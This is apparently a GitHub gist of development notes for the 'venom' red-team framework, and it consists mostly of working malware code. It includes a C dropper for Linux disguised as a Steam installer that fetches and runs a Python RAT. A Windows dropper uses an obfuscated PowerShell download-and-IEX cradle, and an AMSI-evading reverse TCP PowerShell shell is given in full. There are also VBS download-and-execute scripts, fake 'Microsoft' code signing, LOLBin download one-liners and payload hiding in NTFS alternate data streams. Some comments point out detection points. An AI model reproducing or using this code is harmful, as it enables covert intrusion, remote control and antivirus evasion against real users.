@r00t-3xp10it
Last active March 11, 2021 14:08
meterpeter updates
meterpeter new updates

r00t-3xp10it commented Aug 31, 2020

venom v1.0.17 - shinigami

  • venom => category nº3 => agent nº5 (SillyRAT)
    • Target system: Linux distros
    • Dropper.c file before being compiled into a standalone Linux executable
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<unistd.h>

/*
Author: r00t-3xp10it [SSA RedTeam @2020]
Framework: Venom v1.0.17 - Multi-OS - Agent nº 5
Function: Install the python3 SillyRAT requirements, then download and execute
Steam.py (Client reverse tcp python shell) detached from the parent (dropper) process.
Mandatory dependencies: python3 and pip3 {tabulate pynput psutil pillow pyscreenshot pyinstaller}
*/

/*
 * Entry point of the Linux dropper. The process forks once: the parent plays a
 * visible "Steam installer" (prints a banner, shows hostnamectl output and
 * installs python3 plus the pip packages named in the file header), while the
 * child detaches itself with setsid(), fetches Steam.py from the hard-coded
 * LAN address into /tmp and runs it with python3.
 *
 * What a defender can read from the code alone: every step is a shell command
 * run through system(), so /bin/sh, apt-get, pip3, wget and python3 all appear
 * as descendants of this binary; the download is plain HTTP to a fixed IP and
 * the script is written to /tmp before execution. Process ancestry, /tmp
 * file-creation and egress monitoring are therefore the natural detection
 * points for this pattern.
 *
 * Returns 0 in both the parent and the child. A failed fork (pid < 0) matches
 * neither branch below and also falls through to return 0.
 */
int main()
{
   /*
   fork() spawns the child that will run the downloaded script in the
   background while the parent keeps executing the "installer" in the
   foreground. fflush(NULL) is called first, presumably so that buffered stdio
   output is not duplicated into both processes after the fork.
   Article: https://www.geeksforgeeks.org/zombie-and-orphan-processes-in-c
   */
   fflush(NULL);
   int pid = fork();
      if (pid > 0) {
         /*
         Parent process (the child is running concurrently).
         Role: look like a legitimate installer and install the python3 /
         SillyRAT requirements listed in the file header.
         */
         printf("\nSteam - 3.10.5 Linux Installer\n");
         printf("----------------------------------------------------\n");
         /* Show the host's hostnamectl output to the user, as a real installer might */
         sleep(1);system("c=$(hostnamectl);echo \"$c\"");
         printf("----------------------------------------------------\n");

            /* Package installation via system(): apt-get update/install, then pip3 install */
            sleep(1);system("sudo apt-get update && apt-get install -y python3 && pip3 install tabulate pynput psutil pillow pyscreenshot pyinstaller");
            printf("Done.. ALL Steam requirements are satisfied.\n");

      }
      else if (pid == 0) {
         /*
         Child process (background job; becomes an orphan once the parent exits).
         setsid() puts the child in its own session so it is no longer tied to
         the parent (dropper) process, and the downloaded script keeps running
         after the parent terminates.
         After a 3 s delay: cd /tmp, wget the script over plain HTTP from the
         hard-coded address (via sudo), save it as /tmp/Steam.py and run it.
         */
         setsid();
         sleep(3);system("cd /tmp && sudo /usr/bin/wget -qq http://192.168.1.73/Steam.py -O /tmp/Steam.py && python3 Steam.py");
      } return 0;
}


r00t-3xp10it commented Sep 12, 2020

Dropper.c

  • Compile this template to EXE (mingw32)
    • LolBin: new-object -com WinHttp.WinHttpRequest.5.1

/*
Author: r00t-3xp10it (SSA RedTeam @2020)
Framework: Venom v1.0.17 - Amsi Evasion - Agent nº 7
Function: This template is used to download Client.ps1 from the attacker
machine (LAN) and execute it in the target's RAM (fileless - the payload does not touch disk)
*/

#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>

/*
 * Entry point of the Windows dropper template. The $lhost and $Drop tokens look
 * like placeholders the framework substitutes before compilation - TODO confirm.
 * Two system() calls, each spawning powershell.exe:
 *  1. A WScript.Shell Popup asking the user to confirm an "installer" - pure
 *     social engineering; the answer is never checked.
 *  2. A one-liner that assembles its arguments from -f format fragments,
 *     re-launches powershell with -exec <assembled policy> -w 1, fetches
 *     http://$lhost/$Drop.ps1 through the WinHttp.WinHttpRequest.5.1 COM
 *     object and passes the response text to an invoke built as 'i'+'ex',
 *     so the script runs without being written to disk.
 * Defender's view: the whole payload sits on the command line of a
 * powershell.exe child of this binary (typically via cmd.exe, since system()
 * goes through the shell), so command-line auditing and PowerShell script
 * block logging capture it; a hidden window (-w 1) and an execution-policy
 * override requested by an unsigned binary are themselves common alert triggers.
 * Returns 0.
 */
int main()
{
 /* PS MsgBox for target user reading (Social Engineering) */
  system("powershell (New-Object -ComObject Wscript.Shell).Popup(\"\"\"Install Microsoft Application ?\"\"\",4,\"\"\"$Drop - 3.10.5-dev Windows Installer\"\"\",1+64)")

 /* Download $Drop.ps1 over WinHttp and invoke the response text in memory */
  system("powershell $MyCat=("{2}{0}{1}" -f'o','xy','$pr');$Token=("{1}{0}{2}" -f'pa','by','ss');powershell -exec $Token -w 1 -C $MyCat=New-Object -Com WinHttp.WinHttpRequest.5.1;$MyCat.open('GET','http://$lhost/$Drop.ps1',`$false);$MyCat.send();& ('i'+'ex') $MyCat.responseText;");
 return 0;
}


Sign standalone executable (SSL)

  • Ask user to enter SSL password to be used
openssl req -x509 -newkey rsa:4096 -keyout output/key.pem -out output/cert.pem -days 365
osslsigncode sign -certs "output/cert.pem" -pass "toor" -key "output/key.pem" -n "Microsoft" -i "https://www.Microsoft.com" -t "http://timestamp.comodoca.com/authenticode" -in "output/evil_x86.exe" -out "output/signed_x86.exe"

OR:


  • I can use the reverse technique to deliver the URL instead of a dropper
    • But this one-liner technique is suspicious for the target to execute ..
      oki

Reverse tcp ps shell

  • With localhost ip adress obfuscation (hex)

## Build Reverse TCP Powershell Shell (hex obfuscated).
echo "${BlueF}[☠]${white} Writting Reverse Powershell Shell to output ..";sleep 2

<#
Obfuscated (hex) Reverse Powershell Shell
Framework: venom v1.0.17 (amsi evasion)
#>

# Reverse TCP shell client (flat script, no functions).
# Outer loop: assemble the TcpClient type name from the fragments below,
# connect back to the address decoded from hexed, serve commands until the
# stream closes, then reconnect after a 3 second pause.
# hexed and lport are not defined in this block - presumably set by the
# script that emits it (note the bash-style escapes); TODO confirm.
while ($true) {
   # Type name split into fragments, concatenated later as Cache auto bin gui func.
   $gui = "PCli";
   $func = "ent";
   $bin = "ets.TC";
   $auto = ".Net.Sock";
   $Cache = "System";
   $px = $hexed;

      # Decode the callback IP: each hex octet -> decimal, joined with dots.
      $p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';
      # First bytes on the wire are a fake HTTP GET with a browser User-Agent,
      # presumably so the connection looks like web traffic at a glance.
      $w = "GET /index.html HTTP/1.1\`r\`nHost: $p\`r\`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\`r\`nAccept: text/html\`r\`n\`r\`n\";
      # 64 KiB receive buffer; x holds the characters the alias is built from.
      $s = [System.Text.ASCIIEncoding];[byte[]]\$b = 0..65535|%{0};$x = "n-eiorvsxpk5";

      # Defines an alias named after x that spells the iex alias from three
      # characters of x picked by negative indices (true-10, 0xFF-265,
      # 0x9a-158). The odd alias name itself is a fixed string defenders can match.
      Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);
      # System.Net.Sockets.TCPClient(ip, port) built from the fragments above.
      $y = New-Object $Cache$auto$bin$gui$func($p,$lport);
      $z = $y.GetStream();
      $d = $s::UTF8.GetBytes($w);
      $z.Write($d, 0, $d.Length);
      # Prompt sent after every command output: output of whoami plus >.
      $t = (n-eiorvsxpk5 whoami) + "> ";

   # Command loop: read from the socket, run the received text through the
   # alias with stderr merged into stdout, write the output and the prompt back.
   while(($l = $z.Read($b, 0, $b.Length)) -ne 0) {
      $v = (New-Object -TypeName $s).GetString($b,0, $l);
      $d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);
      $z.Write($d, 0, $d.Length);
   }
   # Connection dropped (Read returned 0): close and retry from the top.
   $y.Close();
   Start-Sleep -Seconds 3
}


r00t-3xp10it commented Sep 14, 2020

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

Another example

$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"

amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660


r00t-3xp10it commented Sep 17, 2020

one-liner download

bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png
start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL

Download with VBS api

  • dropper.vbs (replaces the Objshell.Run API that is flagged by AV)
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')" 
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"


r00t-3xp10it commented Sep 17, 2020

Alternate data streams (ADS)


What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac which uses something called resource forks.

Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.


How to see Alternate Data Streams records in CLI?

dir /r



Proof-Of-Concept


  • Create a text file in which a jpg image will be embedded
echo test if it works > SSAredTeam.txt
  • Download kali-linux.jpg
    Kali-linux

  • Append the image file to the text file

type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
  • Delete kali-linux.jpg image
del kali-linux.jpg
  • see ads
dir /r
  • Execute kali-linux.jpg image
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg

ads



hide an mp3 in a text file

  • Create a text file in which an mp3 file will be embedded
echo test if it works > SSAredTeam.txt
  • Append the mp3 file to the text file
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
  • Delete mysong mp3
del mysong.mp3
  • see ads
dir /r
  • Execute mysong.mp3 (ads)
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3



hide an exe in a text file

  • Create a text file in which an exe file will be embedded
echo test if it works > SSAredTeam.txt
  • Append the exe file to the text file
type payload.exe > SSAredTeam.txt:payload.exe
  • Delete payload exe
del payload.exe
  • see ads
dir /r
  • Execute payload.exe (ads)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"




  • Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < SSAredTeam.txt:payload.bat

ADS



  • Execute payload.ps1 stored in an Alternate Data Stream (ADS).
powershell .\SSAredTeam.txt:payload.ps1

ads2


r00t-3xp10it commented Sep 17, 2020

Download files using VBS

' VBScript downloader / launcher (flat script, no procedures).
'  1. Fetch strFileURL with a synchronous MSXML2.XMLHTTP GET.
'  2. On HTTP 200, copy ResponseBody into a binary ADODB.Stream, delete any
'     existing file at strHDLocation, then SaveToFile.
'  3. Show a confirmation MsgBox and start the saved file minimized through
'     WScript.Shell.Exec / cmd, passing ip= and port= arguments.
' Defender notes: a script host creating MSXML2.XMLHTTP and ADODB.Stream and
' then calling WScript.Shell.Exec is a well-known download-and-execute chain;
' the process tree would typically be wscript/cscript -> cmd.exe -> Client.exe,
' and both the URL and the output path are hard-coded literals in this file.

' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"

' Synchronous request (third argument false): send() blocks until the response arrives
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

' Only a 200 response is written out; any other status silently skips the save
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0    'Set the stream position to the start

' Remove a previous copy first; SaveToFile with the default mode does not overwrite
Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
' The MsgBox and the launch below run regardless of whether the download succeeded
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"


av3
